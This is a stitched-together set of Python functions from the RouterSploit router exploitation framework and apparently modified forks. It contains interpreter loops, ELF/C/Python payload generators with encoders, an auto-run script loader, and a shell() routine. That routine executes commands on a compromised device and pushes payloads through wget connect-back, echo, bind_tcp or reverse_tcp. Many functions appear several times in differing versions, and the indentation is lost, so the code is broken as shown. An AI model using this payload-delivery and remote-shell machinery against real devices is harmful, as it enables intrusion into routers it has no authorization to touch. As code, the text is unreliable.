def loadAutoScript(self):
payloadFile = 'NotThing'
try:
payloadFile = open("autoTmpScript.rc",'r') #automate file
except:
print_status('Don\'t have autoTmpScript.rc')
if payloadFile != 'NotThing':
for mycommand in payloadFile.readlines():
mycommand = mycommand.strip()
print_status('%s'%(mycommand))
if not len(mycommand) or mycommand.startswith('#'):
continue
try:
command, args = self.parse_line(mycommand)
if not command:
continue
command_handler = self.get_command_handler(command)
command_handler(args)
except RoutersploitException as err:
print_error(err)
except EOFError:
print_info()
print_status("routersploit stopped")
break
except KeyboardInterrupt:
print_info()
finally:
printer_queue.join()
def __handle_if_noninteractive(self, argv):
noninteractive = False
module = ""
set_opts = []
try:
opts, args = getopt.getopt(argv, "hxm:s:", ["module=", "set="])
except getopt.GetoptError:
print_info("{} -m <module> -s \"<option> <value>\"".format(sys.argv[0]))
sys.exit(2)
for opt, arg in opts:
if opt == "-h":
print_info("{} -x -m <module> -s \"<option> <value>\"".format(sys.argv[0]))
sys.exit(0)
elif opt == "-x":
noninteractive = True
elif opt in ("-m", "--module"):
module = arg
elif opt in ("-s", "--set"):
set_opts.append(arg)
if noninteractive:
self.command_use(module)
for opt in set_opts:
self.command_set(opt)
self.command_exploit()
sys.exit(0)
def run(self):
print_status("Generating payload")
try:
data = self.generate()
except OptionValidationError as e:
print_error(e)
return
if self.output == "elf":
with open(self.filepath, 'wb+') as f:
print_status("Building ELF payload")
content = self.generate_elf(data)
print_success("Saving file {}".format(self.filepath))
f.write(content)
elif self.output == "c":
print_success("Bulding payload for C")
content = self.generate_c(data)
print_info(content)
elif self.output == "python":
print_success("Building payload for python")
content = self.generate_python(data)
print_info(content)
else:
raise OptionValidationError(
"No such option as {}".format(self.output)
)
def _wrapper(self, *args, **kwargs):
try:
if args[1].count(" ") == space_number:
return []
except Exception as err:
print_info(err)
return wrapped_function(self, *args, **kwargs)
def run(self):
print_status("Generating payload")
try:
data = self.generate()
except OptionValidationError as e:
print_error(e)
return
if self.output == "elf":
with open(self.filepath, "wb+") as f:
print_status("Building ELF payload")
content = self.generate_elf(data)
print_success("Saving file {}".format(self.filepath))
f.write(content)
elif self.output == "c":
print_success("Bulding payload for C")
content = self.generate_c(data)
print_info(content)
elif self.output == "python":
print_success("Building payload for python")
content = self.generate_python(data)
print_info(content)
else:
raise OptionValidationError(
"No such option as {}".format(self.output)
)
return content
def __handle_if_noninteractive(self, argv):
noninteractive = False
module = ""
set_opts = []
try:
opts, args = getopt.getopt(argv, "hxm:s:", ["module=", "set="])
except getopt.GetoptError:
print_info("{} -m <module> -s \"<option> <value>\"".format(sys.argv[0]))
sys.exit(2)
for opt, arg in opts:
if opt == "-h":
print_info("{} -x -m <module> -s \"<option> <value>\"".format(sys.argv[0]))
sys.exit(0)
elif opt == "-x":
noninteractive = True
elif opt in ("-m", "--module"):
module = arg
elif opt in ("-s", "--set"):
set_opts.append(arg)
if noninteractive:
self.command_use(module)
for opt in set_opts:
self.command_set(opt)
self.command_exploit()
sys.exit(0)
def _wrapper(self, *args, **kwargs):
try:
if args[1].count(" ") == space_number:
return []
except Exception as err:
print_info(err)
return wrapped_function(self, *args, **kwargs)
def command_run(self, *args, **kwargs):
print_status("Running module...")
try:
self.current_module.run()
except KeyboardInterrupt:
print_info()
print_error("Operation cancelled by user")
except Exception:
print_error(traceback.format_exc(sys.exc_info()))
def command_run(self, *args, **kwargs):
print_status("Running module...")
try:
self.current_module.run()
except KeyboardInterrupt:
print_info()
print_error("Operation cancelled by user")
except Exception:
print_error(traceback.format_exc(sys.exc_info()))
def run(self):
print_status("Generating payload")
payload = self.generate()
if self.encoder:
payload = self.encoder.encode(payload)
if self.fmt:
payload = self.fmt.format(payload)
print_info(payload)
return payload
def command_search(self, *args, **kwargs):
keyword = args[0]
if not keyword:
print_error("Please specify search keyword. e.g. 'search cisco'")
return
for module in self.modules:
if keyword in module:
module = humanize_path(module)
print_info(
"{}\033[31m{}\033[0m{}".format(*module.partition(keyword)))
def run(self):
print_status("Generating payload")
payload = self.generate()
if self.encoder:
payload = self.encoder.encode(payload)
if self.fmt:
payload = self.fmt.format(payload)
print_info(payload)
return payload
def command_search(self, *args, **kwargs):
keyword = args[0]
if not keyword:
print_error("Please specify search keyword. e.g. 'search cisco'")
return
for module in self.modules:
if keyword in module:
module = humanize_path(module)
print_info(
"{}\033[31m{}\033[0m{}".format(*module.partition(keyword))
)
def _show_devices(self, *args, **kwargs): # TODO: cover with tests
try:
devices = self.current_module._Exploit__info__['devices']
print_info("\nTarget devices:")
i = 0
for device in devices:
if isinstance(device, dict):
print_info(" {} - {}".format(i, device['name']))
else:
print_info(" {} - {}".format(i, device))
i += 1
print_info()
except KeyError:
print_info("\nTarget devices are not defined")
def _show_devices(self, *args, **kwargs): # TODO: cover with tests
try:
devices = self.current_module._Exploit__info__['devices']
print_info("\nTarget devices:")
i = 0
for device in devices:
if isinstance(device, dict):
print_info(" {} - {}".format(i, device['name']))
else:
print_info(" {} - {}".format(i, device))
i += 1
print_info()
except KeyError:
print_info("\nTarget devices are not defined")
def nonInteractive(self, argv):
""" Execute specific command and return result without launching the interactive CLI
:return:
"""
module = ""
set_opts = []
try:
opts, args = getopt.getopt(argv[1:], "hm:s:",
["help=", "module=", "set="])
except getopt.GetoptError:
print_info("{} -m <module> -s \"<option> <value>\"".format(
argv[0]))
printer_queue.join()
return
for opt, arg in opts:
if opt in ("-h", "--help"):
print_info("{} -m <module> -s \"<option> <value>\"".format(
argv[0]))
printer_queue.join()
return
elif opt in ("-m", "--module"):
module = arg
elif opt in ("-s", "--set"):
set_opts.append(arg)
if not len(module):
print_error('A module is required when running non-interactively')
printer_queue.join()
return
self.command_use(module)
for opt in set_opts:
self.command_set(opt)
self.command_exploit()
# Wait for results if needed
printer_queue.join()
return
def start(self):
""" Routersploit main entry point. Starting interpreter loop. """
print_info(self.banner)
printer_queue.join()
while True:
try:
command, args, kwargs = self.parse_line(input(self.prompt))
if not command:
continue
command_handler = self.get_command_handler(command)
command_handler(args, **kwargs)
except RoutersploitException as err:
print_error(err)
except (EOFError, KeyboardInterrupt, SystemExit):
print_info()
print_error("RouterSploit stopped")
break
finally:
printer_queue.join()
def start(self):
""" Routersploit main entry point. Starting interpreter loop. """
print_info(self.banner)
printer_queue.join()
payloadFile = 0
# add a function
# let me test iot automate
self.loadAutoScript()
while True:
try:
command, args = self.parse_line(input(self.prompt))
print_status('%s :: %s'%(command,args))
if not command:
continue
command_handler = self.get_command_handler(command)
command_handler(args)
except RoutersploitException as err:
print_error(err)
except EOFError:
print_info()
print_status("routersploit stopped")
break
except KeyboardInterrupt:
print_info()
finally:
printer_queue.join()
def _show_options(self, *args, **kwargs):
target_names = ["target", "port", "ssl", "rhost", "rport", "lhost", "lport"]
target_opts = [opt for opt in self.current_module.options if opt in target_names]
module_opts = [opt for opt in self.current_module.options if opt not in target_opts]
headers = ("Name", "Current settings", "Description")
print_info("\nTarget options:")
print_table(headers, *self.get_opts(*target_opts))
if module_opts:
print_info("\nModule options:")
print_table(headers, *self.get_opts(*module_opts))
print_info()
def _show_options(self, *args, **kwargs):
target_names = ["target", "port", "ssl", "rhost", "rport", "lhost", "lport"]
target_opts = [opt for opt in self.current_module.options if opt in target_names]
module_opts = [opt for opt in self.current_module.options if opt not in target_opts]
headers = ("Name", "Current settings", "Description")
print_info("\nTarget options:")
print_table(headers, *self.get_opts(*target_opts))
if module_opts:
print_info("\nModule options:")
print_table(headers, *self.get_opts(*module_opts))
print_info()
def start(self):
""" Routersploit main entry point. Starting interpreter loop. """
print_info(self.banner)
printer_queue.join()
while True:
try:
command, args = self.parse_line(input(self.prompt))
if not command:
continue
command_handler = self.get_command_handler(command)
command_handler(args)
except RoutersploitException as err:
print_error(err)
except EOFError:
print_info()
print_status("routersploit stopped")
break
except KeyboardInterrupt:
print_info()
finally:
printer_queue.join()
def start(self):
""" exploit main entry point. Starting interpreter loop. """
print_info(self.banner)
printer_queue.join()
while True:
try:
command, args = self.parse_line(input(self.prompt))
if not command:
continue
command_handler = self.get_command_handler(command)
command_handler(args)
except RoutersploitException as err:
print_error(err)
except EOFError:
print_info()
print_status(" stopped")
break
except KeyboardInterrupt:
print_info()
finally:
printer_queue.join()
def command_search(self, *args, **kwargs):
mod_type = ''
mod_detail = ''
mod_vendor = ''
existing_modules = [
name for _, name, _ in pkgutil.iter_modules([MODULES_DIR])
]
devices = [
name for _, name, _ in pkgutil.iter_modules(
[os.path.join(MODULES_DIR, 'exploits')])
]
languages = [
name for _, name, _ in pkgutil.iter_modules(
[os.path.join(MODULES_DIR, 'encoders')])
]
payloads = [
name for _, name, _ in pkgutil.iter_modules(
[os.path.join(MODULES_DIR, 'payloads')])
]
try:
keyword = args[0].strip("'\"").lower()
except IndexError:
keyword = ''
if not (len(keyword) or len(kwargs.keys())):
print_error(
"Please specify at least search keyword. e.g. 'search cisco'")
print_error(
"You can specify options. e.g. 'search type=exploits device=routers vendor=linksys WRT100 rce'"
)
return
for (key, value) in kwargs.items():
if key == 'type':
if value not in existing_modules:
print_error("Unknown module type.")
return
# print_info(' - Type :\t{}'.format(value))
mod_type = "{}.".format(value)
elif key in ['device', 'language', 'payload']:
if key == 'device' and (value not in devices):
print_error("Unknown exploit type.")
return
elif key == 'language' and (value not in languages):
print_error("Unknown encoder language.")
return
elif key == 'payload' and (value not in payloads):
print_error("Unknown payload type.")
return
# print_info(' - {}:\t{}'.format(key.capitalize(), value))
mod_detail = ".{}.".format(value)
elif key == 'vendor':
# print_info(' - Vendor:\t{}'.format(value))
mod_vendor = ".{}.".format(value)
for module in self.modules:
if mod_type not in str(module):
continue
if mod_detail not in str(module):
continue
if mod_vendor not in str(module):
continue
if not all(word in str(module) for word in keyword.split()):
continue
found = humanize_path(module)
if len(keyword):
for word in keyword.split():
found = found.replace(word,
"\033[31m{}\033[0m".format(word))
print_info(found)
def command_help(self, *args, **kwargs):
print_info(self.global_help)
if self.current_module:
print_info("\n", self.module_help)
def __show_modules(self, root=''):
for module in [
module for module in self.modules if module.startswith(root)
]:
print_info(module.replace('.', os.sep))
def _show_info(self, *args, **kwargs):
pprint_dict_in_order(
self.module_metadata,
("name", "description", "devices", "authors", "references"),
)
print_info()
def start(self, argv):
""" Routersploit main entry point. Starting interpreter loop. """
printer_queue.join()
try:
command, args = self.parse_line("use scanners/routers/router_scan")
if not command:
return -1
command_handler = self.get_command_handler(command)
command_handler(args)
except RoutersploitException as err:
print_error(err)
except EOFError:
print_info()
print_status("routersploit stopped")
return -1
except KeyboardInterrupt:
print_info()
finally:
printer_queue.join()
try:
command, args = self.parse_line("set target " + argv)
if not command:
return -1
command_handler = self.get_command_handler(command)
command_handler(args)
except RoutersploitException as err:
print_error(err)
except EOFError:
print_info()
print_status("routersploit stopped")
return -1
except KeyboardInterrupt:
print_info()
finally:
printer_queue.join()
try:
command, args = self.parse_line("run")
if not command:
return -1
command_handler = self.get_command_handler(command)
command_handler(args)
except RoutersploitException as err:
print_error(err)
except EOFError:
print_info()
print_status("routersploit stopped")
return -1
except KeyboardInterrupt:
print_info()
finally:
printer_queue.join()
def shell(exploit, architecture="", method="", payloads=None, **params):
available_payloads = {}
payload = None
options = []
if architecture and method:
path = "routersploit/modules/payloads/{}/".format(architecture)
# get all payloads for given architecture
all_payloads = [f.split(".")[0] for f in listdir(path) if isfile(join(path, f)) and f.endswith(".py") and f != "__init__.py"]
payload_path = path.replace("/", ".")
for p in all_payloads:
module = getattr(importlib.import_module("{}{}".format(payload_path, p)), 'Exploit')
# if method/arch is cmd then filter out payloads
if method is "cmd":
if getattr(module, "cmd") in payloads:
available_payloads[p] = module
else:
available_payloads[p] = module
print_info()
print_success("Welcome to cmd. Commands are sent to the target via the execute method.")
print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.")
print_info()
while True:
while not printer_queue.empty():
pass
if payload is None:
cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
else:
cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Exploit__info__["name"])
cmd = input(cmd_str)
if cmd in ["quit", "exit"]:
return
elif cmd == "show payloads":
if not available_payloads:
print_error("There are no available payloads for this exploit")
continue
print_status("Available payloads:")
headers = ("Payload", "Name", "Description")
data = []
for p in available_payloads.keys():
data.append((p, available_payloads[p]._Exploit__info__["name"], available_payloads[p]._Exploit__info__["description"]))
print_table(headers, *data)
elif cmd.startswith("set payload "):
if not available_payloads:
print_error("There are no available payloads for this exploit")
continue
c = cmd.split(" ")
if c[2] in available_payloads.keys():
payload = available_payloads[c[2]]()
options = []
for option in payload.exploit_attributes.keys():
if option not in ["output", "filepath"]:
options.append([option, getattr(payload, option), payload.exploit_attributes[option][1]])
if payload.handler == "bind_tcp":
options.append(["rhost", exploit.target, "Target IP address"])
if method == "wget":
options.append(["lhost", "", "Connect-back IP address for wget"])
options.append(["lport", 4545, "Connect-back Port for wget"])
else:
print_error("Payload not available")
elif payload is not None:
if cmd == "show options":
headers = ("Name", "Current settings", "Description")
print_info('\nPayload Options:')
print_table(headers, *options)
print_info()
elif cmd.startswith("set "):
c = cmd.split(" ")
if len(c) != 3:
print_error("set <option> <value>")
else:
for option in options:
if option[0] == c[1]:
try:
setattr(payload, c[1], c[2])
except Exception:
print_error("Invalid value for {}".format(c[1]))
break
option[1] = c[2]
print_info("{} => {}".format(c[1], c[2]))
elif cmd == "run":
data = payload.generate()
if method == "wget":
elf_binary = payload.generate_elf(data)
communication = Communication(exploit, elf_binary, options, **params)
if communication.wget() is False:
print_error("Exploit failed to transfer payload")
continue
elif method == "echo":
elf_binary = payload.generate_elf(data)
communication = Communication(exploit, elf_binary, options, **params)
communication.echo()
elif method == "cmd":
params["exec_binary"] = data
communication = Communication(exploit, "", options, **params)
if payload.handler == "bind_tcp":
communication.bind_tcp()
elif payload.handler == "reverse_tcp":
communication.reverse_tcp()
elif cmd == "back":
payload = None
else:
print_status("Executing '{}' on the device...".format(cmd))
print_info(exploit.execute(cmd))
def _show_info(self, *args, **kwargs):
pprint_dict_in_order(
self.module_metadata,
("name", "description", "devices", "authors", "references"),
)
print_info()
def run(self):
print_status("Generating payload")
print_info(
self.generate()
)
def __show_modules(self, root=''):
for module in [module for module in self.modules if module.startswith(root)]:
print_info(module.replace('.', os.sep))
def command_help(self, *args, **kwargs):
print_info(self.global_help)
if self.current_module:
print_info("\n", self.module_help)
